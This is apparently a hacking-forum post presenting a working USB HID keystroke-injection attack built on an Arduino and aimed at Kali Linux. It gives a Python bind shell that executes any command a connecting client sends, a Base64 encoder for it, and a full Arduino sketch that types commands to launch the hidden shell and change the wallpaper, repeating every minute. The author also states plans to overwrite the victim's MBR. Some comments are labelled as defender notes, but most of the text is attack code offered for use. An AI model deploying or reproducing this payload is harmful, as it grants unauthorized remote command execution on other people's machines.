Weaponized Arduino (USB HID Attack) for targeting Kali Linux

NOP

I recently wrote a very basic HID attack, but I decided to take it a step further. I designed a USB HID attack that opens up a GNOME terminal (using Alt+F2, since Ctrl+Alt+T is no longer the default on Kali boxes) and runs several commands.

Currently the attack changes the user's desktop wallpaper and shells them using a Python shell I wrote that is Base64-encoded. I decided against a reverse shell because if you can plug a USB device into the computer, you can get on the network anyway.

Here is a demo of an attack. The delays on the attack are set REALLY long because I was having issues with the laptop being too slow.
https://vid.me/e/D7W9?autoplay=1

The attack will eventually overwrite the MBR of the kali install but I'm trying to figure out the best way to handle it. If you're interested in the bootloader's code just ask me and I'll share it with you.

The Python Shell

import socket, subprocess
# Bind shell: listens on TCP port p (h == '' binds every local interface) and
# runs each chunk it receives as a shell command, returning the output.
# Python 2 code (the companion encoder uses the print statement and recv() is
# compared against a str literal here).
# Defender note: on the host this shows up as a python process holding an
# unexpected listening TCP socket, started from a terminal session that began
# right after a new USB keyboard enumerated.
h = ''
#p = 1338
# NOTE: p is not defined in this file; the one-liner emitted by the encoder
# sets p=1338 before exec'ing the decoded source.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# SO_REUSEADDR so the port can be rebound promptly after a restart.
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((h, p))
s.listen(10)
# Serves one client at a time, forever.
while 1:
  c, address = s.accept()
  # Each 1024-byte chunk goes straight to subprocess with shell=True, i.e.
  # whoever connects gets command execution as the user that launched this
  # script; an empty recv() (peer closed) ends the session.
  while 1:
    d = c.recv(1024)
    if (d == ""):
      break
    c.send(subprocess.check_output(d, shell=True))
  c.close()
s.close()

The Python Encoder

#!/usr/bin/python
# usage: cat code.py  | ./encodePy > payload
import fileinput, sys, time, base64
# Concatenate every input line (stdin, or files named on the command line)
# into a single string.
code = ''
for l in fileinput.input():
  code = code + l
# Emit the one-liner the keystroke injector will type: it base64-decodes the
# script and exec()s it, pre-setting p=1338 (the port the shell binds), which
# the script itself leaves undefined. Python 2 print statement.
# Defender note: Base64 here only avoids quoting problems when typing; it is
# not encryption, so the original script is recovered by decoding the literal
# found in the sketch.
print "python -c \"import base64;p=1338;eval(compile(base64.b64decode('" + base64.b64encode(code) + "'), '<string>', 'exec'));\""

The Arduino Sketch
# Note: remove the spaces from the wget line. They were added to the URL to prevent image formatting.

// Open the GNOME "Run a command" dialog with Alt+F2, type `command` into it
// and press Return. The fixed delays give the dialog time to appear before
// typing; the author notes they are deliberately long for slow hosts.
// Defender note: this only works against an unlocked, focused GNOME session
// in which Alt+F2 is still bound to the run dialog.
void f2Run(char command[]) {
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F2);
  delay(200);
  Keyboard.releaseAll();
  delay(500);
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

// Type `command` into whatever window currently has keyboard focus and press
// Return. Keyboard.begin()/end() bracket each print; the short delays are
// there so the host registers the keystrokes in order.
void runCommand(char command[]) {
  Keyboard.begin();
  Keyboard.print(command);
  Keyboard.end();
  delay(100);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(100);
}

// Launch gnome-terminal via the Alt+F2 run dialog, then wait 1.5 s so the
// terminal is up and focused before any command is typed into it.
void gnomeTerminal() {
  f2Run("gnome-terminal");
  delay(1500);
}

// Start the Base64-encoded Python bind shell (the "Python Shell" listed
// above) in the background of the open terminal; the one-liner sets p=1338,
// the TCP port the shell listens on.
// Defender note: decoding the literal below yields the plain-text script, so
// the listener's port and behaviour are fully recoverable from the sketch.
void shell() {
  // python shell
  runCommand("python -c \"import base64;p=1338;eval(compile(base64.b64decode('aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcwpoID0gJycKI3AgPSAxMzM4CnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCnMuc2V0c29ja29wdChzb2NrZXQuU09MX1NPQ0tFVCwgc29ja2V0LlNPX1JFVVNFQUREUiwgMSkKcy5iaW5kKChoLCBwKSkKcy5saXN0ZW4oMTApCndoaWxlIDE6CiAgYywgYWRkcmVzcyA9IHMuYWNjZXB0KCkKICB3aGlsZSAxOgogICAgZCA9IGMucmVjdigxMDI0KQogICAgaWYgKGQgPT0gIiIpOgogICAgICBicmVhawogICAgYy5zZW5kKHN1YnByb2Nlc3MuY2hlY2tfb3V0cHV0KGQsIHNoZWxsPVRydWUpKQogIGMuY2xvc2UoKQpzLmNsb3NlKCkK'), '<string>', 'exec'));\" &");
}

// Fetch an image with wget into the terminal's working directory and set it
// as the GNOME desktop background via gsettings. The spaces in the URL are
// the ones the post says were inserted to defeat forum image formatting.
// Defender note: the outbound wget and the gsettings change are the most
// visible artefacts of this payload.
void wallpaper() {
  // Image payloads are too big, sticking with wget.
  runCommand("wget http://   i.imgur.com/3Novb98  .   jpg;gsettings set org.gnome.desktop.background picture-uri file://`pwd`/3Novb98.jpg;gsettings set org.gnome.desktop.background picture-options \"centered\"");
}

// Arduino entry point, run once at power-up: only opens the serial port.
// Keyboard.begin() is called per command inside the helpers, not here.
void setup() {
  Serial.begin(9600);
}

// Arduino main loop: wait 3 s after enumeration, open a terminal, start the
// bind shell, change the wallpaper, type `exit` to close the terminal, then
// sleep 60 s. Because loop() runs repeatedly, the whole sequence re-runs
// roughly once a minute while the device stays plugged in.
void loop() {
  delay(3000);
  gnomeTerminal();
  shell();
  wallpaper();
  runCommand("exit");
  delay(60000);
}